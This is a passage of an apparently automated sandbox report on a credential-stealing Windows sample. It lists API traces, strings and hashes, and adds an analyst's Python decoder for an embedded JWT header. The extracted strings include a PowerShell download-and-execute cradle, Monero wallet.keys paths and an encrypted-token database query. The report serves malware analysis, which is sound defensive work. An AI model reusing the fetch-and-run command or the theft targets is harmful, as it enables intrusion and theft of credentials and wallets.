                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0026BCCD
                        • lstrlen.KERNEL32(00000000), ref: 0026BDA5
                        • lstrlen.KERNEL32(00000000), ref: 0026BDB9
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: a8209f671da9a1e04e9c5764ce1d11990e2376d7d960d93b7ad1450f77fee63e
                        • Instruction ID: 00d82397872f6890526a308d6eb7a02de114811a785c9a67a21cabad17835cad
                        • Opcode Fuzzy Hash: a8209f671da9a1e04e9c5764ce1d11990e2376d7d960d93b7ad1450f77fee63e
                        • Instruction Fuzzy Hash: AAB111759201089BDB04FBA0DD96EEE773CAF94310F408169F50AA6091EF346A79CF66
                        APIs
                        Strings
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: 573f6a0bf034f18c6d6fbbf07efc1df3e2b67b50ceb72b0d44333c2857b27f16
                        • Instruction ID: 0b6f542729bb30fa34110254db9831101ee4316901ed07a00c9b6be3e873f5db
                        • Opcode Fuzzy Hash: 573f6a0bf034f18c6d6fbbf07efc1df3e2b67b50ceb72b0d44333c2857b27f16
                        • Instruction Fuzzy Hash: 04F01734904209EFD384AFE1E909B6DBA70FB06702F0401A8E609862D0D7748E61DB9A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00264FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00264FD1
                        • InternetOpenA.WININET(00280DDF,00000000,00000000,00000000,00000000), ref: 00264FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00265011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00265041
                        • InternetCloseHandle.WININET(?), ref: 002650B9
                        • InternetCloseHandle.WININET(?), ref: 002650C6
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: d5433ebfc90bcecad5b5e4775f8775a6938a199e8a8c31f479e9f1fa67deefc1
                        • Instruction ID: 75fdc4a7f3c574fbf7afdd07fe956c9706b9066ca021a304e5da9e427a21e31e
                        • Opcode Fuzzy Hash: d5433ebfc90bcecad5b5e4775f8775a6938a199e8a8c31f479e9f1fa67deefc1
                        • Instruction Fuzzy Hash: 9E3108B4A00218ABDB20CF54DC85BDDB7B4EB48704F1081E8FA09A7281C7706AD5CF99
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00278426
                        • wsprintfA.USER32 ref: 00278459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0027847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0027848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00278499
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,00E2E130,00000000,000F003F,?,00000400), ref: 002784EC
                        • lstrlen.KERNEL32(?), ref: 00278501
                        • RegQueryValueExA.ADVAPI32(00000000,00E2E0B8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00280B34), ref: 00278599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00278608
                        • RegCloseKey.ADVAPI32(00000000), ref: 0027861A
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 0838fa7870e227ddd9798e1d2af3651829de16471fa2649b405276adb65cb63c
                        • Instruction ID: bf4ac4b5d9886e5f546588e4e42e863b346dada6afc3d576ec648b7b52234f82
                        • Opcode Fuzzy Hash: 0838fa7870e227ddd9798e1d2af3651829de16471fa2649b405276adb65cb63c
                        • Instruction Fuzzy Hash: 1E212A71950218ABDB24DF54CC85FE9B7B8FB48700F00C1A8E60996180DF716A95CFD4
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0027773B
                        • RegOpenKeyExA.ADVAPI32(80000002,00E1C350,00000000,00020119,002776B9), ref: 0027775B
                        • RegQueryValueExA.ADVAPI32(002776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0027777A
                        • RegCloseKey.ADVAPI32(002776B9), ref: 00277784
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 98472ae6bf08d12e18e661975b0dd9b5caafcb7e3d0285415ae202c1109a1681
                        • Instruction ID: 627d6f8b03daee68f5575d5ab47b16502a773224f7034ebbc0009a0e53f61e19
                        • Opcode Fuzzy Hash: 98472ae6bf08d12e18e661975b0dd9b5caafcb7e3d0285415ae202c1109a1681
                        • Instruction Fuzzy Hash: C40144B9A40308BBDB00EFE0DC4AFBEBBB8EB48701F004158FA05A7281D7749524CB55
                        APIs
                        • CreateFileA.KERNEL32(:',80000000,00000003,00000000,00000003,00000080,00000000,?,00273AEE,?), ref: 002792FC
                        • GetFileSizeEx.KERNEL32(000000FF,:'), ref: 00279319
                        • CloseHandle.KERNEL32(000000FF), ref: 00279327
                        Strings
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :'$:'
                        • API String ID: 1378416451-956700391
                        • Opcode ID: 46fc8803e2822563a23b04457b6b9e037c8d9f572b234f600db5f112a054fec5
                        • Instruction ID: 33522cf6460f9ffdc9f750dc6cfd5451a17700dba72f92f4930900baf07ece01
                        • Opcode Fuzzy Hash: 46fc8803e2822563a23b04457b6b9e037c8d9f572b234f600db5f112a054fec5
                        • Instruction Fuzzy Hash: 0AF08C38E50308BBDB10DFB0DC08BAE7BB9AB48310F10C2A4B655AB2C0D6749650CF44
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                        • LocalFree.KERNEL32(0026148F), ref: 00269A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 0cb65b922559d3346ab37031a38da8ecaea8fe56f1a54e1a77d3123266bd72ed
                        • Instruction ID: f104c03d807fe9996d4528c5f49505745e2dcf374da18dbcc6ae3f2dfd2dea32
                        • Opcode Fuzzy Hash: 0cb65b922559d3346ab37031a38da8ecaea8fe56f1a54e1a77d3123266bd72ed
                        • Instruction Fuzzy Hash: 30311A74A10209EFDB14CF94C885BAE7BF9FF49310F108158E911AB290DB75AD91CFA1
                        APIs
                        Strings
                        Yara matches
                        Similarity
                        • API ID: String___crt$Typememset
                        • String ID:
                        • API String ID: 3530896902-3916222277
                        • Opcode ID: da414bbec8f8e7f0bc410b61f5dd3c26cda7c1e3dc5037046cbea686f84ecb19
                        • Instruction ID: 245fdf78dc892428f7433a5a58333584c2fb9c6a8f4fd08577a171022057ebc0
                        • Opcode Fuzzy Hash: da414bbec8f8e7f0bc410b61f5dd3c26cda7c1e3dc5037046cbea686f84ecb19
                        • Instruction Fuzzy Hash: 6341C6B151075C9EDB228B34CC85BFBBBED9F45704F2484ECEA8E86182D2719A548F60
                        APIs
                        • lstrcat.KERNEL32(?,00E2E4D8), ref: 002747DB
                          • Part of subcall function 00278DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00278E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00274801
                        • lstrcat.KERNEL32(?,?), ref: 00274820
                        • lstrcat.KERNEL32(?,?), ref: 00274834
                        • lstrcat.KERNEL32(?,00E1B8F8), ref: 00274847
                        • lstrcat.KERNEL32(?,?), ref: 0027485B
                        • lstrcat.KERNEL32(?,00E2DC30), ref: 0027486F
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 00278D90: GetFileAttributesA.KERNEL32(00000000,?,00261B54,?,?,0028564C,?,?,00280E1F), ref: 00278D9F
                          • Part of subcall function 00274570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00274580
                          • Part of subcall function 00274570: RtlAllocateHeap.NTDLL(00000000), ref: 00274587
                          • Part of subcall function 00274570: wsprintfA.USER32 ref: 002745A6
                          • Part of subcall function 00274570: FindFirstFileA.KERNEL32(?,?), ref: 002745BD
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                        • String ID:
                        • API String ID: 2540262943-0
                        • Opcode ID: 05edfd54478b468dee208fd8e0ce94acd17702dc2eceb6e61946eb7685b3d5f2
                        • Instruction ID: 5069c16020899784b404aaec1bf02f8b7c6ca39bc9f7fdbf56541ee200ba1d6c
                        • Opcode Fuzzy Hash: 05edfd54478b468dee208fd8e0ce94acd17702dc2eceb6e61946eb7685b3d5f2
                        • Instruction Fuzzy Hash: BD3196B295020897CB50FBB0DC89EED777CBB58700F408599B31996081EF749799CF96
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00272D85
                        Strings
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00272D04
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00272CC4
                        • <, xrefs: 00272D39
                        • ')", xrefs: 00272CB3
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: dc2452cf86762aa1b86a19e79470f7270af6814d675ab1fbe162e7e0e123d679
                        • Instruction ID: 524631feded82730aa5144b61ed98c628e879476bdebd7a331da6aad6ad26e91
                        • Opcode Fuzzy Hash: dc2452cf86762aa1b86a19e79470f7270af6814d675ab1fbe162e7e0e123d679
                        • Instruction Fuzzy Hash: 2E41C371C20108DADB18FFA0C896FDEBB74AF54310F408129F11AA7191DF746A6ACF96
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00269F41
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 75f2ccc8a61d183f5e90e3f9b963d0cfef900f637d508d57089626f72d50a4ed
                        • Instruction ID: c2db6fed363d0c6d9b901a3dd92026445f8a0480196c7610b88ffed16dc16b38
                        • Opcode Fuzzy Hash: 75f2ccc8a61d183f5e90e3f9b963d0cfef900f637d508d57089626f72d50a4ed
                        • Instruction Fuzzy Hash: F8616271A20208DBDB18EFA4CC96FEEB775AF84304F008118F90A5F181DB746A65CF52
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • memset.MSVCRT ref: 0027716A
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0027718C
                        • s', xrefs: 00277111
                        • s', xrefs: 002772AE, 00277179, 0027717C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpymemset
                        • String ID: s'$s'$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 4047604823-3815180687
                        • Opcode ID: f28ec73ef48e6570e7fe39987b43a4da9370e123205f9ef27de61f3bcf6d0a2c
                        • Instruction ID: 94f06e96cb9574b61a170cc87be0826e259ecadf428be8ea7a03aa4918f8a844
                        • Opcode Fuzzy Hash: f28ec73ef48e6570e7fe39987b43a4da9370e123205f9ef27de61f3bcf6d0a2c
                        • Instruction Fuzzy Hash: 9251B0B0D242199BDB14EF90DC81BEEB374AF44304F5081A8E61D77182EB746E98CF69
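The String ID of this function is a hex dump of 43 ASCII bytes. Decoding it is worth doing before searching for it elsewhere: the bytes read eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0, which is unpadded base64 for the JSON object { "typ": "JWT", "alg": "EdDSA" }, i.e. a JWT header. What the sample does with that header is not shown in this listing, so no use is asserted here. The script below is an added example, not code from the report: it carries the report string through the three layers (hex dump, ASCII, base64) and restores the missing '=' padding, which is why a strict decoder such as Python's base64.b64decode rejects the value as found. Function names are my own.

```python
import base64
import json

# String ID copied from this function's entry in the report (space-separated hex bytes).
REPORT_HEX = (
    "65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 "
    "62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30"
)


def hexdump_to_ascii(dump: str) -> str:
    """Convert a Joe Sandbox style 'xx xx xx' dump to the text it encodes.
    Strict ASCII on purpose: a non-printable byte raises, which is the right
    outcome when the guess that the blob is text is wrong."""
    return bytes.fromhex(dump.replace(" ", "")).decode("ascii")


def b64decode_unpadded(s: str) -> bytes:
    """Base64 decode that restores missing '=' padding. Strings embedded in
    malware are often stored without it (43 chars here), and base64.b64decode
    raises binascii.Error unless the length is a multiple of 4."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4), validate=True)


def decode_report_string(dump: str) -> dict:
    """hex dump -> ASCII -> base64 -> JSON, returning every intermediate layer
    so each can be pivoted on (the ASCII form is what to grep other samples for)."""
    ascii_text = hexdump_to_ascii(dump)
    raw = b64decode_unpadded(ascii_text)
    text = raw.decode("utf-8")
    return {"ascii": ascii_text, "decoded": text, "json": json.loads(text)}


if __name__ == "__main__":
    for layer, value in decode_report_string(REPORT_HEX).items():
        print(f"{layer:>8}: {value}")
```

The ASCII layer is the form to search for in other samples and in memory dumps, since that is how the string sits in the binary; the hex dump is only how the report renders it.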
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00277E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,00E1C4A0,00000000,00020119,?), ref: 00277E5E
                        • RegQueryValueExA.ADVAPI32(?,00E2D9B0,00000000,00000000,000000FF,000000FF), ref: 00277E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00277E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 92dd7390578d2081df347c8cd6f7d72ffafa7631cee8f49f85546ef17603349a
                        • Instruction ID: 815b8c06b774bb8a32f1fbf544e440726339ae325fe790860809d99c9d3050bf
                        • Opcode Fuzzy Hash: 92dd7390578d2081df347c8cd6f7d72ffafa7631cee8f49f85546ef17603349a
                        • Instruction Fuzzy Hash: 7711A0B1A54205EBD700DF94DD4AFBBBBB8FB09B00F108129F605A7280D7B85814CBA1
                        APIs
                        • StrStrA.SHLWAPI(00E2E0D0,?,?,?,0027140C,?,00E2E0D0,00000000), ref: 0027926C
                        • lstrcpyn.KERNEL32(004AAB88,00E2E0D0,00E2E0D0,?,0027140C,?,00E2E0D0), ref: 00279290
                        • lstrlen.KERNEL32(?,?,0027140C,?,00E2E0D0), ref: 002792A7
                        • wsprintfA.USER32 ref: 002792C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 1d64c54dc8a952b47b2f5a4c146ac16c13673a7f089f011cf467badc1d4ca19a
                        • Instruction ID: a02144a7e15050e1bcab0f925863a307fd0fe93bc44385dec298faa1962749ad
                        • Opcode Fuzzy Hash: 1d64c54dc8a952b47b2f5a4c146ac16c13673a7f089f011cf467badc1d4ca19a
                        • Instruction Fuzzy Hash: F7011E75500208FFCB04DFECC988EAE7BB9EB49350F108158F9098B241C735EA60DBA6
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002612B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 002612BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002612D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002612F5
                        • RegCloseKey.ADVAPI32(?), ref: 002612FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: ea0fbd993a1c1a97eb09f435aeed9098f9eeaed4ea9253057e9e0ebccb5d5a6e
                        • Instruction ID: 0d33b03d6892bcfe80ea674d4d1ee9cf34d203b4667db3ed80c467d9e6c61ba9
                        • Opcode Fuzzy Hash: ea0fbd993a1c1a97eb09f435aeed9098f9eeaed4ea9253057e9e0ebccb5d5a6e
                        • Instruction Fuzzy Hash: 940131B9A40208BFDB00DFE0DC49FAEBBB8EB48701F008169FA0597280D774AA15CF55
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00276663
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00276726
                        • ExitProcess.KERNEL32 ref: 00276755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: bd31e9cb5eaacc299da4628412f17ba2d340044f81cf33086f7748adde32a3b3
                        • Instruction ID: 7d9671753bf490e4e1f9970a40062694224fa6c2cfe2612e6dfce4078965d729
                        • Opcode Fuzzy Hash: bd31e9cb5eaacc299da4628412f17ba2d340044f81cf33086f7748adde32a3b3
                        • Instruction Fuzzy Hash: 773161B1C11208ABDB54EB50DC86FDEBB78AF44310F408198F31A66191DF746B58CF5A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00280E28,00000000,?), ref: 0027882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00278836
                        • wsprintfA.USER32 ref: 00278850
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 51466b41cd0728ccaefdf8393b9d8b4124eba6ea2569f9f800579194a01dbde7
                        • Instruction ID: b94dc168dc1cae08886696b77e1bc50dea399ddd55d5ccdb1deb26e26993ad90
                        • Opcode Fuzzy Hash: 51466b41cd0728ccaefdf8393b9d8b4124eba6ea2569f9f800579194a01dbde7
                        • Instruction Fuzzy Hash: 6A214FB1A50208AFDB04DF94DD49FAEBBB8FB49B11F10412DF605A7280C779A910CFA5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0027951E,00000000), ref: 00278D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00278D62
                        • wsprintfW.USER32 ref: 00278D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 0a6efadf6e19f404bb3b641dfdfa5ba23613286e1ba70ad8bcba24e66d48cb74
                        • Instruction ID: dc3c956aaaecf7568d88790bcbc7274d7de520ce579c17a98a34e0fa6236bfc2
                        • Opcode Fuzzy Hash: 0a6efadf6e19f404bb3b641dfdfa5ba23613286e1ba70ad8bcba24e66d48cb74
                        • Instruction Fuzzy Hash: A5E08674A40208BFC700EF94DC09E597BB8EB05701F000068FD0987280DA759E24CB56
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 00278B60: GetSystemTime.KERNEL32(00280E1A,00E2A610,002805AE,?,?,002613F9,?,0000001A,00280E1A,00000000,?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 00278B86
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0026A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 0026A3FF
                        • lstrlen.KERNEL32(00000000), ref: 0026A6BC
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 0026A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 5269517442a32bf34dd9967ae16516797106f139d79fdbea743ab51bd8d45226
                        • Instruction ID: 56102a0c53bc9d7d0f9375b321625178181fa013447c6ce22106bac5c71aaede
                        • Opcode Fuzzy Hash: 5269517442a32bf34dd9967ae16516797106f139d79fdbea743ab51bd8d45226
                        • Instruction Fuzzy Hash: DCE1CF728201189ADB05FBA4DC92EEE733CAF94310F50C169F51B76091EF346A69CF66
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 00278B60: GetSystemTime.KERNEL32(00280E1A,00E2A610,002805AE,?,?,002613F9,?,0000001A,00280E1A,00000000,?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 00278B86
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0026D481
                        • lstrlen.KERNEL32(00000000), ref: 0026D698
                        • lstrlen.KERNEL32(00000000), ref: 0026D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0026D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
